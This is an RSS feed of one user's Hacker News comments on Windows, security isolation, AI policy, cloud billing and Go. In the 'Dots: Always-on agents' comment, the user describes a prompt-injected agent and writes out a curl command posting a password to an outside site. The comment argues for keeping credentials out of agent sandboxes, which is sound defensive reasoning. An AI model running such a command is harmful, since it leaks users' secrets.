<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom"><channel><title>Hacker News: eddythompson80</title><link>https://news.ycombinator.com/user?id=eddythompson80</link><description>Hacker News RSS</description><docs>https://hnrss.org/</docs><generator>hnrss v2.1.1</generator><lastBuildDate>Sun, 11 Oct 2026 01:48:13 +0000</lastBuildDate><atom:link href="https://hnrss.org/user?id=eddythompson80" rel="self" type="application/rss+xml"></atom:link><item><title><![CDATA[New comment by eddythompson80 in "WSL3 Performance is about 5-60% faster than WSL2 depending on the workload"]]></title><description><![CDATA[
<p>> Apparently windows problems like randomly failing wifi are rather common on the Lenovo legion 5 laptops from 2021<p>Unfortunately I have some bad news for you about random device drivers on linux. I guess with AI you can now fix the driver upstream yourself though.</p>
]]></description><pubDate>Sat, 10 Oct 2026 18:53:08 +0000</pubDate><link>https://news.ycombinator.com/item?id=50035934</link><dc:creator>eddythompson80</dc:creator><comments>https://news.ycombinator.com/item?id=50035934</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=50035934</guid></item><item><title><![CDATA[New comment by eddythompson80 in "Mxc: Microsoft Execution Containers version 1.0.0"]]></title><description><![CDATA[
<p>I'm assuming they mean egress not ingress. Unless you restrict the machine egress to another machine running IIS both on the same AD and configure IIS as an http proxy with Windows Identity integration.<p>You're then brining an entire MS tech stack from the mid 2000s just to achieve something that has been solved by virtualization with a lot less caveats a long time ago.</p>
]]></description><pubDate>Sat, 10 Oct 2026 18:49:39 +0000</pubDate><link>https://news.ycombinator.com/item?id=50035900</link><dc:creator>eddythompson80</dc:creator><comments>https://news.ycombinator.com/item?id=50035900</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=50035900</guid></item><item><title><![CDATA[New comment by eddythompson80 in "Mxc: Microsoft Execution Containers version 1.0.0"]]></title><description><![CDATA[
<p>The same-machine-multi-user security paradigm has been dead for a long time. Even on linux, you pretty much assume root or non-root and leave it at that. You then use other layers (namespacing, kvm, etc) to enforce actual security isolation and controls.<p>root/non-root split is almost entirely used as a "don't let people <i>accidentally</i> shoot themselves in the foot" mechanism these days. Like you don't want your point-of-sale operator to accidentally disable the network or mess up the firewall rules effectively bricking the machine. Requiring an IT person to make the trip to fix it for them. But you would never "trust" the separate user profile on that POS machine as something keeping a purposefully malicious employee out of a secure system. The entire machine, regardless of the user profile, is the same security context. The uid/gid concept is an antique from the 80s that stopped working a long time ago. It's just an organizational primitive now for the most part.<p>I remember the fun days of the 90s and early 2000s when there were shared machines that a ton of people would ssh or rdp into with different user account and "share compute". It was fun, but absolutely no bueno for a long time now.</p>
]]></description><pubDate>Sat, 10 Oct 2026 18:45:02 +0000</pubDate><link>https://news.ycombinator.com/item?id=50035846</link><dc:creator>eddythompson80</dc:creator><comments>https://news.ycombinator.com/item?id=50035846</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=50035846</guid></item><item><title><![CDATA[New comment by eddythompson80 in "Telegram Desktop vulnerability allowed any user's file to be stolen"]]></title><description><![CDATA[
<p>Not really sure that’s safe. There has been at least 1 Qubes OS specific VM escapes this year and 2 KVM guest->host control ones.</p>
]]></description><pubDate>Sat, 10 Oct 2026 14:36:15 +0000</pubDate><link>https://news.ycombinator.com/item?id=50033437</link><dc:creator>eddythompson80</dc:creator><comments>https://news.ycombinator.com/item?id=50033437</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=50033437</guid></item><item><title><![CDATA[New comment by eddythompson80 in "Telegram Desktop vulnerability allowed any user's file to be stolen"]]></title><description><![CDATA[
<p>Personally I only open Firefox on Linux booted from a read only usb. In theory there could be a firmware vulnerability in the CPU that could let it write persistent data to the UEFI firmware, but I hope the possibility is small.</p>
]]></description><pubDate>Sat, 10 Oct 2026 08:11:19 +0000</pubDate><link>https://news.ycombinator.com/item?id=50030802</link><dc:creator>eddythompson80</dc:creator><comments>https://news.ycombinator.com/item?id=50030802</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=50030802</guid></item><item><title><![CDATA[New comment by eddythompson80 in "Theranos.world"]]></title><description><![CDATA[
<p>I don’t know about this particular case, but sentences are usually reduced to 3/4 or 2/3 depending on a bunch of factors referred to as good behavior. Unless a judge or a law explicitly disallows that depending on the crime or the sentencing. The amount varies by state or court type and judges usually account for that when deciding on the sentencing</p>
]]></description><pubDate>Fri, 09 Oct 2026 05:29:25 +0000</pubDate><link>https://news.ycombinator.com/item?id=50016355</link><dc:creator>eddythompson80</dc:creator><comments>https://news.ycombinator.com/item?id=50016355</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=50016355</guid></item><item><title><![CDATA[New comment by eddythompson80 in "Anthropic reported diary entry to police, woman faces felony charge"]]></title><description><![CDATA[
<p>That’s… really not true or at least not as dramatic as that statement makes it sound.<p>Those “special workstations” are mostly about lack of features they view as potential attack vectors (external or internal motherboard ports, replaceable/non-soldered components, thunderbolt, anything extensible or “repairable”) and mandate certain hardware features (hardware tpm, locked secure boot, locked UEFI). Other than that, those workstations are Lenovo, Samsung, or Dell machines running typical chips. They may pick certain CPU models or chips but that’s mostly about avoiding new or “cool” features that may not have matured enough yet. Most of them are moving to thin clients though. Where you use that “special workstation” to remote into an VM that can access production systems. And that part is partially about controlling the software running in the VM and making sure updates can be forced “offline” on the VM even if you haven’t connected to it in few weeks.</p>
]]></description><pubDate>Tue, 06 Oct 2026 05:52:43 +0000</pubDate><link>https://news.ycombinator.com/item?id=49974716</link><dc:creator>eddythompson80</dc:creator><comments>https://news.ycombinator.com/item?id=49974716</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=49974716</guid></item><item><title><![CDATA[New comment by eddythompson80 in "Pixel 11 doesn't yet meet the GrapheneOS security standards and may be skipped"]]></title><description><![CDATA[
<p>The original announcement was vague[0]. Most assumed that Motorola will be releasing a GOS phone[1], but as more information became available it seems that Motorola will release a GOS-compatible phone. At least to start. Both sides are not commenting on if a phone would eventually ship with GOS from the factory AFAIK. But I'm guessing neither wants to commit to anything right now.<p>[0] <a href="https://grapheneos.social/@GrapheneOS/116159602850585685" rel="nofollow">https://grapheneos.social/@GrapheneOS/116159602850585685</a><p>[1] <a href="https://www.reddit.com/r/GrapheneOS/comments/1rik0np/motorola_news_motorolas_new_partnership_with/" rel="nofollow">https://www.reddit.com/r/GrapheneOS/comments/1rik0np/motorol...</a></p>
]]></description><pubDate>Mon, 05 Oct 2026 22:32:11 +0000</pubDate><link>https://news.ycombinator.com/item?id=49971733</link><dc:creator>eddythompson80</dc:creator><comments>https://news.ycombinator.com/item?id=49971733</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=49971733</guid></item><item><title><![CDATA[New comment by eddythompson80 in ""No Vendor Lock-In" Is Code for "No Product""]]></title><description><![CDATA[
<p>The post is really incoherent. If I'm understanding it correctly, it's trying to say "product" is claude code/cowork/paper/codex/etc, not the model. So building a claude code/cowork/paper/codex/etc clone with a model selector is bad, because you're just cloning a successful product and the model doesn't matter so you don't have a product because (again) it's just a clone.<p>I think I get what it's trying to say, but there is so much roundabout thinking.<p>Just say "Focus more on the user experience and trying to distinguish yourself from the frontier lab product you're trying to copy. Your users won't tolerate a clone-with-model-selector for too long"? I think</p>
]]></description><pubDate>Sun, 04 Oct 2026 23:58:17 +0000</pubDate><link>https://news.ycombinator.com/item?id=49959228</link><dc:creator>eddythompson80</dc:creator><comments>https://news.ycombinator.com/item?id=49959228</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=49959228</guid></item><item><title><![CDATA[New comment by eddythompson80 in "I quit OpenAI because its culture is broken"]]></title><description><![CDATA[
<p>> That sounds reasonable. If applied to OpenAI and their agents multiple times breaking out of bad secured sandboxes, it should be enough.<p>Does it? To me it seems reasonable for OpenAI to argue they <i>did</i> try to be careful evident by the sandbox, they just made a mistake. Almost every 0day is categorized by something like that. We haven’t had a long history of establishing a negligence charge to security bugs. Could you be sued because you didn’t demonstrate “carefulness” and used Linux which is not written in a memory safe language and has had multiple CVEs before? How complicated should the chain of an exploit be to demonstrate “carefulness” to the courts?<p>> training<p>OP was the one suggesting that training could be controlled because massive gpu clusters could be regulated the way a nuclear power plant could. If you assume training costs won’t drop, then it’s feasible I guess. However, unlike a nuclear reactor, the final training result isn’t a radio active material, but rather an ordinary file that anyone can load and use for inference.</p>
]]></description><pubDate>Sun, 04 Oct 2026 15:14:50 +0000</pubDate><link>https://news.ycombinator.com/item?id=49954606</link><dc:creator>eddythompson80</dc:creator><comments>https://news.ycombinator.com/item?id=49954606</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=49954606</guid></item><item><title><![CDATA[New comment by eddythompson80 in "We're going to need default hard budget caps on pretty much everything"]]></title><description><![CDATA[
<p>Yes, thats one way to implement it. It still moves that global billing system into a ring 0 importance with 99.9999% availability and performance requirement, where before it wasn’t even in the picture. Not impossible, just suddenly every single AWS (or GCP or Azure etc) has a global single point of failure that gates all their performance and runtime actions.<p>Not to mention having no way to network isolate such service as every single service in every single network boundary needs to be able to contact such service, and every service needs (more or less) same auth permissions on all user accounts it’s running.<p>Again, solvable problems with enough code, but not simple problems by any means if you operate at a large scale.</p>
]]></description><pubDate>Sun, 04 Oct 2026 15:07:21 +0000</pubDate><link>https://news.ycombinator.com/item?id=49954538</link><dc:creator>eddythompson80</dc:creator><comments>https://news.ycombinator.com/item?id=49954538</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=49954538</guid></item><item><title><![CDATA[New comment by eddythompson80 in "I quit OpenAI because its culture is broken"]]></title><description><![CDATA[
<p>They are both used.</p>
]]></description><pubDate>Sun, 04 Oct 2026 05:44:07 +0000</pubDate><link>https://news.ycombinator.com/item?id=49951015</link><dc:creator>eddythompson80</dc:creator><comments>https://news.ycombinator.com/item?id=49951015</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=49951015</guid></item><item><title><![CDATA[New comment by eddythompson80 in "I quit OpenAI because its culture is broken"]]></title><description><![CDATA[
<p>> Is that a reason to just accept bad public policy?<p>Not necessarily, but it should probably inform that public policy. I think the problem is no one knows what the public policy should be assuming that scenario is true. Even if you, somehow, regulate away massive GPU cluster training making such future training impossible, existing models are already here. Further already training smaller models for things like images, speech, and other specialties is cheaper than the bigger models.<p>I agree that we need some regulations like everything else, but it’s not clear to me what the right policy should be. I think the European ai act is a fine start, but it’s clearly not enough nor does it necessarily limits the training portion just the application portion. Not to mention that the requirements there can be summarized into something like “you have to be careful, and show evidence you tried to be careful”.</p>
]]></description><pubDate>Sun, 04 Oct 2026 05:40:45 +0000</pubDate><link>https://news.ycombinator.com/item?id=49951001</link><dc:creator>eddythompson80</dc:creator><comments>https://news.ycombinator.com/item?id=49951001</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=49951001</guid></item><item><title><![CDATA[New comment by eddythompson80 in "We're going to need default hard budget caps on pretty much everything"]]></title><description><![CDATA[
<p>In this example, that would require the “big query” to have billing baked into its actual query runtime, which isn’t impossible, just not how one would design a query planner per se. Usually such services emit metrics of usage units, then the billing calculation happens in a completely different system taking into account discounts, promotions, contracts, regional and currency differences, etc.<p>Suddenly a database, a storage service or a computer service needs to be aware of the billing situations and make behavioral decisions based on the billing status. Again, not impossible, but something that suddenly promotes billing from an async/non-crucial background service that can be paused, replayed, adjusted by account teams etc, into a crucial hot-path service.</p>
]]></description><pubDate>Sun, 04 Oct 2026 03:47:51 +0000</pubDate><link>https://news.ycombinator.com/item?id=49950422</link><dc:creator>eddythompson80</dc:creator><comments>https://news.ycombinator.com/item?id=49950422</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=49950422</guid></item><item><title><![CDATA[New comment by eddythompson80 in "We're going to need default hard budget caps on pretty much everything"]]></title><description><![CDATA[
<p>Can I store few petabytes, and pay for it for one day every 90 days to reset the timer?</p>
]]></description><pubDate>Sun, 04 Oct 2026 03:26:47 +0000</pubDate><link>https://news.ycombinator.com/item?id=49950312</link><dc:creator>eddythompson80</dc:creator><comments>https://news.ycombinator.com/item?id=49950312</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=49950312</guid></item><item><title><![CDATA[New comment by eddythompson80 in "The Four Horsemen of Agentic Coding"]]></title><description><![CDATA[
<p>This is how I have been thinking too. Programming as a mass-market career is over the same way being a tailor, a blacksmith, a cobbler a carpenter, etc for the mass market is also over. Unlike programming, those profession enjoyed millennials of history so there is still some type of romantic idea of a "hand made garment" or a "hand made leather shoe", but outside of very small market for that, there is no economical value in those anymore. The fact that a person might have enjoyed sewing or woodworking as a vocation is incidental to people's need for clothes or cabinets.<p>I don't think anyone would care about "hand made software", arguably no one ever did. You need a tool to do X. The enjoyment of the person producing that tool is entirely incidental. You don't care if the corn you're eating was hand picked by a person who loved manual farm labor or by a combine harvester. Just like you wouldn't care if someone enjoys driving a combine vs a self-driving combine nor if someone enjoys directing self-driving harvesters or if they are self-directing.</p>
]]></description><pubDate>Fri, 02 Oct 2026 18:49:51 +0000</pubDate><link>https://news.ycombinator.com/item?id=49937110</link><dc:creator>eddythompson80</dc:creator><comments>https://news.ycombinator.com/item?id=49937110</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=49937110</guid></item><item><title><![CDATA[New comment by eddythompson80 in "Dots: Always-on agents"]]></title><description><![CDATA[
<p>That’s not really true. The “exposing your credentials to the model” threat is in the model getting tricked into `curl -XPOST <a href="https://random.website" rel="nofollow">https://random.website</a> -d ‘your_password’`. If the credentials are never available inside the sandbox and is only injected outside the sandbox then that’s an entire attack vector that is eliminated.<p>Further limiting the actual domains, URLs, and/or Methods a model can call on a given endpoint is also possible. It does get more complicated, but it is possible. It has the benefit of having these agents work with the actual services and tools everyone is using right now. Expecting every service to implement federated IAM permissions through an IdP like google or okta before a model can begin to use it is a losing battle. It’s like asking if the whole internet can change to fit a fine-grain access permissions.<p>Any system offering actual fine-grain access permissions (AWS IAM, Azure Entra, Google OAuth, even GitHub fine-grain tokens) is a pain in the ass to manage. You are then left with the “Connectors” companies that offer a proxy between you and the actual service you want to call with their own APIs and permission structure. Now you don’t call eBay APIs directly, you call a “Connector” that exposes a set of eBay functionality for you.<p>The scope of startup would be basically the “internet”. Just make sure you support the internet with a federated identity layer on top. It’s not impossible, and I’m pretty sure that’s Cloudflares current mission statement, but it’s hardly a simple task. If you want a fast go-to-market approach, you do the secret vault approach and piecemeal an http policy per scenario. They you can run the scenario in a “learning” mode, then come up with the list of allowed urls/domains/methods and deliver the thing. As opposed to (quite literally) re-writing the “internet”</p>
]]></description><pubDate>Wed, 30 Sep 2026 07:35:14 +0000</pubDate><link>https://news.ycombinator.com/item?id=49905655</link><dc:creator>eddythompson80</dc:creator><comments>https://news.ycombinator.com/item?id=49905655</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=49905655</guid></item><item><title><![CDATA[New comment by eddythompson80 in "Tesla takes on $30B in credit as it approaches unprofitability"]]></title><description><![CDATA[
<p>Not really. Peugeot has been making 7 seaters for over half a century now.</p>
]]></description><pubDate>Wed, 30 Sep 2026 06:12:56 +0000</pubDate><link>https://news.ycombinator.com/item?id=49905050</link><dc:creator>eddythompson80</dc:creator><comments>https://news.ycombinator.com/item?id=49905050</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=49905050</guid></item><item><title><![CDATA[New comment by eddythompson80 in "Go Concurrency Distilled"]]></title><description><![CDATA[
<p>Others have mentioned the main issues, but to add; you often end up writing “ugly” code to do basic concurrency operations. Often setting up channels or workgroups then a `go func {}(…); wg.Wait();` just feels wrong and makes you thing “I must be doing something wrong, there must a better way, but that’s IS the way. It’s just go syntax quirks at the end of the day, and makes you appreciate go’s simplicity over high abstractions.<p>In my experience the main hurdle was getting developers on the team onboard with go’s way. It felt like swimming upstream for my 6 year stint in go. I was in a very Java heavy “enterprise” but we were writing a kubernetes operator and I pushed to use golang because (a) I liked it, and (b) it was 2019 and the entire kubernetes ecosystem was primarily go.<p>To <i>me</i> golang was very simple and I drank Rob Pike’s and Google’s narrative of how easy it’s to get a competent “compute science major in college”-person to pick up go. What I experienced was a form of “you can’t teach an old dog new tricks”. Lazy (and I hate to use this word) developers who gotten so used to frameworks and IDEs doing all the heavy lifting for them in Java or C# had 0 appetite forgetting all the questionable patterns they learned over the years and adopt Go’s <i>simplicity</i>. It was very frustrating at time, yet gave me a good eye for the actual skilled talent in the organization vs the average enterprise developer persona.</p>
]]></description><pubDate>Sun, 27 Sep 2026 02:48:33 +0000</pubDate><link>https://news.ycombinator.com/item?id=49862868</link><dc:creator>eddythompson80</dc:creator><comments>https://news.ycombinator.com/item?id=49862868</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=49862868</guid></item><item><title><![CDATA[New comment by eddythompson80 in "VSCode's SSH Agent Is Bananas (2025)"]]></title><description><![CDATA[
<p>Oh okay maybe I misunderstood because you said low end FOSS editors. When I think “low end editor” I think something like notepad or gedit.</p>
]]></description><pubDate>Thu, 24 Sep 2026 08:33:51 +0000</pubDate><link>https://news.ycombinator.com/item?id=49827874</link><dc:creator>eddythompson80</dc:creator><comments>https://news.ycombinator.com/item?id=49827874</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=49827874</guid></item></channel></rss>